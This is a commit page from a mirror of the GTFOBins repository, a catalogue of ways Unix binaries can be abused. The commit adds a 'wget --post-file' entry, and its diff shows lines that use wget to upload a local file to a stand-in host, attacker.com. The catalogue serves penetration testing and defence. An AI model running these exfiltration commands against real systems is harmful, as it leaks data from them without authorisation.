mirror of
				https://github.com/GTFOBins/GTFOBins.github.io
				synced 2025-10-31 00:38:54 +01:00 
			
		
		
		
	Add wget --post-file
This commit is contained in:
		| @@ -6,6 +6,9 @@ functions: | ||||
|         export URL=http://attacker.com/ | ||||
|         export LFILE=file_to_send | ||||
|         wget --post-data="d=$(base64 $LFILE | tr -d '\n')" $URL | ||||
|       code: | | ||||
|         export URL=http://attacker.com/ | ||||
|         wget --post-file="/path/file_to_send" $URL | ||||
|   download: | ||||
|     - description: Fetch a remote file via HTTP GET request. | ||||
|       code: | | ||||
|   | ||||
		Reference in New Issue
	
	Block a user